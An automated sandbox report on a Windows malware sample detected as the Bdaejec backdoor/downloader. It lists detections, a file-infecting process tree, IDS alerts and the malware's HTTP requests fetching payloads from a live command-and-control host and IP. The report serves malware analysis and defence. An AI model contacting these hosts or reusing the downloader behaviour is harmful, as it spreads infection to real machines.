Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BXOZIGZEUa.exe

Overview

General Information

Sample name:BXOZIGZEUa.exe
renamed because original name is a hash value
Original sample name:8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8.exe
Analysis ID:1585133
MD5:fa07873f37b171a5567a9b4b3f2c65eb
SHA1:47d5210522d8c54d3076c1467f2f495025037bb6
SHA256:8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8
Tags:exeuser-zhuzhu0009
Infos:

Detection

Bdaejec
Score:66
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries device information via Setup API
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • BXOZIGZEUa.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\BXOZIGZEUa.exe" MD5: FA07873F37B171A5567A9B4B3F2C65EB)
    • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • JdEV.exe (PID: 7800 cmdline: C:\Users\user\AppData\Local\Temp\JdEV.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 8032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 1608 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: JdEV.exe PID: 7800JoeSecurity_BdaejecYara detected BdaejecJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-07T06:01:13.644513+010028079081Malware Command and Control Activity Detected192.168.2.114973644.221.84.105799TCP
    2025-01-07T06:01:17.906835+010028079081Malware Command and Control Activity Detected192.168.2.114976244.221.84.105799TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-07T06:01:12.995032+010028385221Malware Command and Control Activity Detected192.168.2.11648591.1.1.153UDP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: BXOZIGZEUa.exeAvira: detected
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarLAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarCHITECTURE=x86PROCESSAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net/$3Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar;Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarDAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarDC:Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.raroAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarYAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarsAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rar-Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarxAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarsAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net/j&aAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar$Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net/x&Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarQAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarLAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net/Avira URL Cloud: Label: malware
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeReversingLabs: Detection: 97%
    Source: BXOZIGZEUa.exeReversingLabs: Detection: 94%
    Source: BXOZIGZEUa.exeVirustotal: Detection: 87%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: BXOZIGZEUa.exeJoe Sandbox ML: detected
    Source: BXOZIGZEUa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Users\user\Desktop\uninstall.logJump to behavior
    Source: BXOZIGZEUa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: D:\Workspace\Driver\DriverUninstall\Release\DriverUninstall.pdb source: BXOZIGZEUa.exe
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.3.dr

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001CB7F2 lstrlenW,SetLastError,FindFirstFileW,GetLastError,__wfullpath,__wsplitpath_s,__wmakepath_s,1_2_001CB7F2
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001CB3FE GetModuleHandleW,GetProcAddress,FindFirstFileW,1_2_001CB3FE
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001DD5ED __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,1_2_001DD5ED
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_003429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,3_2_003429E2
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_00342B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,3_2_00342B8C
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.11:64859 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.11:49762 -> 44.221.84.105:799
    Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.11:49736 -> 44.221.84.105:799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 799
    Source: global trafficTCP traffic: 192.168.2.11:49736 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_00341099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,3_2_00341099
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: JdEV.exe, 00000003.00000003.1360033401.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
    Source: JdEV.exe, 00000003.00000002.1613503596.0000000001263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/$3
    Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/j&a
    Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/x&
    Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.000000000119E000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000003.1379761142.0000000001241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar$
    Source: JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar;
    Source: JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarD
    Source: JdEV.exe, 00000003.00000003.1379761142.0000000001241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarDC:
    Source: JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarL
    Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
    Source: JdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
    Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar-
    Source: JdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarCHITECTURE=x86PROCESS
    Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarL
    Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarQ
    Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarY
    Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.raro
    Source: JdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rars
    Source: JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarx
    Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
    Source: SciTE.exe.3.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.3.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.3.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.3.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: SciTE.exe.3.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.3.drString found in binary or memory: http://www.develop.comDeepak
    Source: SciTE.exe.3.drString found in binary or memory: http://www.lua.org
    Source: SciTE.exe.3.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.3.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.3.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.3.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.3.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.3.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: JdEV.exe, 00000003.00000002.1613503596.0000000001241000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000003.1379761142.0000000001241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: SciTE.exe.3.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.3.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_00210549 GetClientRect,GetAsyncKeyState,SendMessageW,SetScrollPos,1_2_00210549
    Source: SciTE.exe.3.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_0d9c64b2-b
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002120D5 GetKeyState,GetKeyState,GetKeyState,GetKeyState,1_2_002120D5
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_0020A90D ScreenToClient,_memset,_free,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,1_2_0020A90D
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001E4F49 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,ImmGetContext,ImmGetOpenStatus,ImmReleaseContext,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,1_2_001E4F49
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001E3094 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,ImmGetContext,ImmGetOpenStatus,ImmReleaseContext,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,1_2_001E3094
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_0020794D SendMessageW,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageW,1_2_0020794D
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_0021FE15 GetWindowRect,GetKeyState,GetKeyState,GetKeyState,KillTimer,GetFocus,SetTimer,1_2_0021FE15

    System Summary

    barindex
    Source: MyProg.exe.3.drStatic PE information: section name: Y|uR
    Source: JdEV.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Windows\inf\oem0.PNFJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Windows\inf\oem1.PNFJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Windows\inf\oem3.PNFJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002BE1201_2_002BE120
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002C01701_2_002C0170
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_0025083D1_2_0025083D
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_0020CF371_2_0020CF37
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002CF14C1_2_002CF14C
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002BF9C81_2_002BF9C8
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_003460763_2_00346076
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_00346D003_2_00346D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\JdEV.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: String function: 002BEABF appears 50 times
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: String function: 002BF180 appears 48 times
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: String function: 002BEA56 appears 181 times
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 1608
    Source: MyProg.exe.3.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: BXOZIGZEUa.exe, 00000001.00000000.1357824062.000000000033B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDriverUninstall.exe@ vs BXOZIGZEUa.exe
    Source: BXOZIGZEUa.exeBinary or memory string: OriginalFilenameDriverUninstall.exe@ vs BXOZIGZEUa.exe
    Source: BXOZIGZEUa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: JdEV.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: JdEV.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: JdEV.exe.1.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal66.spre.troj.evad.winEXE@7/16@1/1
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_0034119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,3_2_0034119F
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001CD36B CoInitialize,CoCreateInstance,1_2_001CD36B
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002B86A5 GetUserDefaultUILanguage,FindResourceExW,FindResourceW,LoadResource,GlobalAlloc,1_2_002B86A5
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Users\user\Desktop\uninstall.logJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7800
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Users\user\AppData\Local\Temp\JdEV.exeJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: BXOZIGZEUa.exeReversingLabs: Detection: 94%
    Source: BXOZIGZEUa.exeVirustotal: Detection: 87%
    Source: unknownProcess created: C:\Users\user\Desktop\BXOZIGZEUa.exe "C:\Users\user\Desktop\BXOZIGZEUa.exe"
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeProcess created: C:\Users\user\AppData\Local\Temp\JdEV.exe C:\Users\user\AppData\Local\Temp\JdEV.exe
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 1608
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeProcess created: C:\Users\user\AppData\Local\Temp\JdEV.exe C:\Users\user\AppData\Local\Temp\JdEV.exeJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: devrtl.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: spinf.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: drvstore.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: wintypes.dllJump to behavior
